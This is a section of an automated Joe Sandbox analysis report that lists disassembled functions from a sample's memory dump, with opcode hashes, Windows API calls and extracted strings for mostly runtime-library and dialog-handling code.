                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                              • Instruction ID: 3d7ffd143cdae1b9b187befe1e34e49110ea431d9f8c1e260e62d4ab05545c26
                                                              • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                              • Instruction Fuzzy Hash: D0918AB03003558BDB24EE65E894BFA77D4EBD0308F90092FF986C7281DA7C9595C35A
                                                              Function 004243BF Relevance: .2, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction ID: e6c140a3a4db22094a86635f16844dc70d2571e6bd4221e120ef6eb5bc9802a5
                                                              • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                              • Instruction Fuzzy Hash: 9B8130713043555BDB25EE54E890BBE37D4EBD1308F80492FEAC68B282DA7C89C5875E
                                                              Function 004351C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d992aca750face3608d05b29ddd4791024a326d65373f89e3b6922cde5947ed9
                                                              • Instruction ID: 160033748631492e86b048189d051fc1d84c8bfdd8653dbcc94a4317892d8562
                                                              • Opcode Fuzzy Hash: d992aca750face3608d05b29ddd4791024a326d65373f89e3b6922cde5947ed9
                                                              • Instruction Fuzzy Hash: 84619931600F0856DA38AA68A891BBF6394EB5D344F14395FEC43DF381D69DED428A4E
                                                              Function 00434F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                              • Instruction ID: 6d55780e9fa2d493e2e69dd2436257af6193529c31e4d7945b17f50a7baf4a6a
                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                              • Instruction Fuzzy Hash: 9E513560604E4457DF3855288556BFF63E59B4E344F18381BE882CB382C60EEE4687AE
                                                              Function 0041EFE2 Relevance: .2, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d9f10eef400f2764a368ca0535c89874267124585d4d8141dc80ce69b7dfb517
                                                              • Instruction ID: 3a18d36a8d470bb90d02fc670585e6240ebf4d614e729072684616bd2273eaea
                                                              • Opcode Fuzzy Hash: d9f10eef400f2764a368ca0535c89874267124585d4d8141dc80ce69b7dfb517
                                                              • Instruction Fuzzy Hash: 8F51E5715083D59FD711CF35C1404AEBFE0AE9A318F4909AEE4D95B243C225DA8FCB66
                                                              Function 004200B7 Relevance: .1, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4ab61a350d8a6dc50b6095f0f386871b14b177a810588d4149f5be78071ac35
                                                              • Instruction ID: f6dcece2e2db2e2e0d59c1f4798744cf5f13165829834fd04e9ceb58f3fba719
                                                              • Opcode Fuzzy Hash: b4ab61a350d8a6dc50b6095f0f386871b14b177a810588d4149f5be78071ac35
                                                              • Instruction Fuzzy Hash: 9551EFB1A087119FC748CF19D48065AF7E1FF88314F058A2EE899E3341D735EA59CB9A
                                                              Function 00423E0B Relevance: .1, Instructions: 112COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction ID: 8d5546d0a53b7e5b708c30fcce629f5b41d50ed942ca87f7d63edd795629f095
                                                              • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                              • Instruction Fuzzy Hash: 2B3115B1B147568FCB14EF29D8512AABBE0FB95305F40452EE485C7341C73CEA4ACB96
                                                              Function 0041E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0041E30E
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                                • Part of subcall function 00421DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00451030,00000200,0041D928,00000000,?,00000050,00451030), ref: 00421DC4
                                                              • _strlen.LIBCMT ref: 0041E32F
                                                              • SetDlgItemTextW.USER32(?,0044E274,?), ref: 0041E38F
                                                              • GetWindowRect.USER32(?,?), ref: 0041E3C9
                                                              • GetClientRect.USER32(?,?), ref: 0041E3D5
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0041E475
                                                              • GetWindowRect.USER32(?,?), ref: 0041E4A2
                                                              • SetWindowTextW.USER32(?,?), ref: 0041E4DB
                                                              • GetSystemMetrics.USER32(00000008), ref: 0041E4E3
                                                              • GetWindow.USER32(?,00000005), ref: 0041E4EE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0041E51B
                                                              • GetWindow.USER32(00000000,00000002), ref: 0041E58D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                              • String ID: $%s:$CAPTION$d$tD
                                                              • API String ID: 2407758923-3216612198
                                                              • Opcode ID: fce45456909ce546a5b10c033c2b90e929479138da22abc94d1650906dd0a3df
                                                              • Instruction ID: 72a19ed68e3932e9f5ccf7f32c65d94700d8fecd7c2fff0d50b772510562c776
                                                              • Opcode Fuzzy Hash: fce45456909ce546a5b10c033c2b90e929479138da22abc94d1650906dd0a3df
                                                              • Instruction Fuzzy Hash: D181A471604301AFD710DFA9CD85AABBBE9FBC8704F04092EFA88D7250D734E9458B56
                                                              Function 0043CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 0043CB66
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C71E
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C730
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C742
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C754
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C766
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C778
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C78A
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C79C
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7AE
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7C0
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7D2
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7E4
                                                                • Part of subcall function 0043C701: _free.LIBCMT ref: 0043C7F6
                                                              • _free.LIBCMT ref: 0043CB5B
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 0043CB7D
                                                              • _free.LIBCMT ref: 0043CB92
                                                              • _free.LIBCMT ref: 0043CB9D
                                                              • _free.LIBCMT ref: 0043CBBF
                                                              • _free.LIBCMT ref: 0043CBD2
                                                              • _free.LIBCMT ref: 0043CBE0
                                                              • _free.LIBCMT ref: 0043CBEB
                                                              • _free.LIBCMT ref: 0043CC23
                                                              • _free.LIBCMT ref: 0043CC2A
                                                              • _free.LIBCMT ref: 0043CC47
                                                              • _free.LIBCMT ref: 0043CC5F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID: hD
                                                              • API String ID: 161543041-262436526
                                                              • Opcode ID: a5d40b9caad3cdec41a8b0ed7f7b32a09375fdf7e5f5d37bab312572b6625523
                                                              • Instruction ID: 23f76f1826dd0316f7119351c2db324b9e8039861a3f5847b63200f01b807288
                                                              • Opcode Fuzzy Hash: a5d40b9caad3cdec41a8b0ed7f7b32a09375fdf7e5f5d37bab312572b6625523
                                                              • Instruction Fuzzy Hash: 3A311D315003059FEB21AA3AE885B5BB7F5AF18714F14741FF558E6291DF39E840CB18
                                                              Function 004396F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00439705
                                                                • Part of subcall function 00438DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34), ref: 00438DE2
                                                                • Part of subcall function 00438DCC: GetLastError.KERNEL32(00443A34,?,0043C896,00443A34,00000000,00443A34,00000000,?,0043C8BD,00443A34,00000007,00443A34,?,0043CCBA,00443A34,00443A34), ref: 00438DF4
                                                              • _free.LIBCMT ref: 00439711
                                                              • _free.LIBCMT ref: 0043971C
                                                              • _free.LIBCMT ref: 00439727
                                                              • _free.LIBCMT ref: 00439732
                                                              • _free.LIBCMT ref: 0043973D
                                                              • _free.LIBCMT ref: 00439748
                                                              • _free.LIBCMT ref: 00439753
                                                              • _free.LIBCMT ref: 0043975E
                                                              • _free.LIBCMT ref: 0043976C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID: 0dD
                                                              • API String ID: 776569668-2869565352
                                                              • Opcode ID: 3be0604f65efa44c7263c700ec063853a29b1664a94be60055dddfc4e6a911d2
                                                              • Instruction ID: 557c86e3216c5c085d84fc1428c4712dc833ba6f2d3ca716db24c33a7f0848e7
                                                              • Opcode Fuzzy Hash: 3be0604f65efa44c7263c700ec063853a29b1664a94be60055dddfc4e6a911d2
                                                              • Instruction Fuzzy Hash: F411D776110209BFCB01EF55C842CD97B75EF28754F0160AAFA084F262DE35DE509B88
                                                              Function 00429711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00429736
                                                              • _wcslen.LIBCMT ref: 004297D6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 004297E5
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00429806
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0042982D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1777411235-4209811716
                                                              • Opcode ID: 6617356d6379e01ab399a44df48570677e04ea77c90cd75eca4a048f5239184d
                                                              • Instruction ID: 00d645727ce03a2e3df03bbd97a6350652c3f9ea69f7ebb4887c4d0bdf7644ab
                                                              • Opcode Fuzzy Hash: 6617356d6379e01ab399a44df48570677e04ea77c90cd75eca4a048f5239184d
                                                              • Instruction Fuzzy Hash: 3C313B322083217AE725AF25AC06F5B7798EF86725F14011FF501961D1EB7C9E0482AD
                                                              Function 0042D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 0042D6C1
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0042D6ED
                                                                • Part of subcall function 00421FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0041C116,00000000,.exe,?,?,00000800,?,?,?,00428E3C), ref: 00421FD1
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0042D709
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0042D720
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0042D734
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0042D75D
                                                              • DeleteObject.GDI32(00000000), ref: 0042D764
                                                              • GetWindow.USER32(00000000,00000002), ref: 0042D76D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: f9191d222b0c2c55044e2dea1a8157d44fdaae691c10f22b530dfd56ed62d993
                                                              • Instruction ID: 8334846503c8cae2eca84c881e8b75f31bd67d594aee5bdbecf8aecaa540910a
                                                              • Opcode Fuzzy Hash: f9191d222b0c2c55044e2dea1a8157d44fdaae691c10f22b530dfd56ed62d993
                                                              • Instruction Fuzzy Hash: 431105327003607BE2206B71BC4AFAF775CAB94712F804136FA85E1191D66C8A8552AD
                                                              Function 00432E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: 14c6390a64f184b21b4a4860027c2300ffb924e3ea8800ab68bbe742a73b71b8
                                                              • Instruction ID: c836a9073998cbde4344fa8d30851cee90a4716c58eb0ab4e0ee9ab6f141d6d1
                                                              • Opcode Fuzzy Hash: 14c6390a64f184b21b4a4860027c2300ffb924e3ea8800ab68bbe742a73b71b8
                                                              • Instruction Fuzzy Hash: 82B18A31800209EFCF28EFA5C9819AFBBB5BF08315F14515BE8016B312C779DA51CB99
                                                              Function 0041AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nB
                                                              • API String ID: 3519838083-1801942350
                                                              • Opcode ID: 9223ade153508a06b95d7f528e0de6c5966ef62d55763282afc06cf663288ace
                                                              • Instruction ID: f293f5fd20df806e881d982557f94379e6ca61bc1d7dcd932818eba3c544018a
                                                              • Opcode Fuzzy Hash: 9223ade153508a06b95d7f528e0de6c5966ef62d55763282afc06cf663288ace
                                                              • Instruction Fuzzy Hash: D8719F70A00219AFDF14DFA4CC959AFBBB9FF49715B10016EF412A72A0CB346D42CB54
                                                              Function 00416FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00416FAA
                                                              • _wcslen.LIBCMT ref: 00417013
                                                              • _wcslen.LIBCMT ref: 00417084
                                                                • Part of subcall function 00417A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00417AAB
                                                                • Part of subcall function 00417A9C: GetLastError.KERNEL32 ref: 00417AF1
                                                                • Part of subcall function 00417A9C: CloseHandle.KERNEL32(?), ref: 00417B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3122303884-3508440684
                                                              • Opcode ID: 19477b61cdba12af2c5a240c30c3065342af5373d7ef61c4098cbfd84b986289
                                                              • Instruction ID: 3805e7c027e5f264562b258b4d8a29f24c25391dc61fb9b4ad38348b8829c5c3
                                                              • Opcode Fuzzy Hash: 19477b61cdba12af2c5a240c30c3065342af5373d7ef61c4098cbfd84b986289
                                                              • Instruction Fuzzy Hash: A641CAB1D0434479EB20EB719C82FEFB77C9F04748F00445BFA55A6282D67CAAC48769
                                                              Function 0042B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                              Download Yara Rule
